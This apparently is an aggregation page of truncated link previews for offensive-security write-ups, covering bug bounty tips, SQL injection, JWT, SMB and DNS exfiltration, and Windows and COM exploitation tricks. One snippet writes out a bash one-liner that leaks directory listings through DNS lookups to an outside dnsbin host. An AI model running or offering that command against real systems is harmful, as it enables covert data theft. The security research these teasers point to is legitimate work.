Understanding the proper URL structure is important to every Bug bounty hunter. So lets go deep dive into the URL structure.

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.

Exploiting a Tricky Blind SQL Injection inside LIMIT clause Hey! Everyone I know its been a long time Since I last posted an article. so T...

Hi, So this is my first writeup, I hope you enjoy it! I was just searching around on YouTube if I could find anything but I was really tired and it was 12:30 in the night. I was poking around and I…

Security Research. Contribute to mirchr/security-research development by creating an account on GitHub.

[ 07/30] #bashtricks (g)old - RCE via DNS based data exfiltration even is there is a firewall blocking 80 & 443 ports, works on port 53 & most times is open go to dnsbin.zhack.ca execute a simple 'ls' for i in $(ls);do host $i.96a755.d.zhack.ca;done #Bugbounty…

For adversarial scenarios, AWS console access is better than the APIs. We'll walk you through our research process here, and release a new tool we've built!

In Infosec, Data Exfiltration is one of main threats and concerns nowadays when fighting against cybercrime, both from malware perspective…

Use SMB to extract data out of a database server quickly without any use of domain names, especially useful in Blind SQL Injections

Recently we encountered a scenario where we were pen-testing a web service endpoint which employed a per request session-id which acted like a anti-CSRF token. This meant that a fresh id was issues for each request. If the session id was not correct in next…

At NotSoSecure, we conduct Pen Test/ Code Reviews on a day-to-day basis and we recently came across an interesting piece of PHP code that could lead to RCE, but the exploitation was bit tricky. After

JSON Web Token is a compact mechanism used for transferring claims between two parties. These are generally represented as JSON objects and can be signed to protect the integrity of the underlying

Although this vulnerability doesn’t directly result in a full elevation of privileges with code execution as NT AUTHORITY\SYSTEM, it is still quite interesting because of the exploitation “tricks” involved. Diagnostic Tracking Service (a.k.a. Connected User…

This link will take you to a page that’s not on LinkedIn

introduction Use Object COM ( InternetExplorer.Application ) For Execute using Types Exploit-internet Explorer For Execute ==> in Add On Internet Explorer For Get Execute Code using Lateral Move…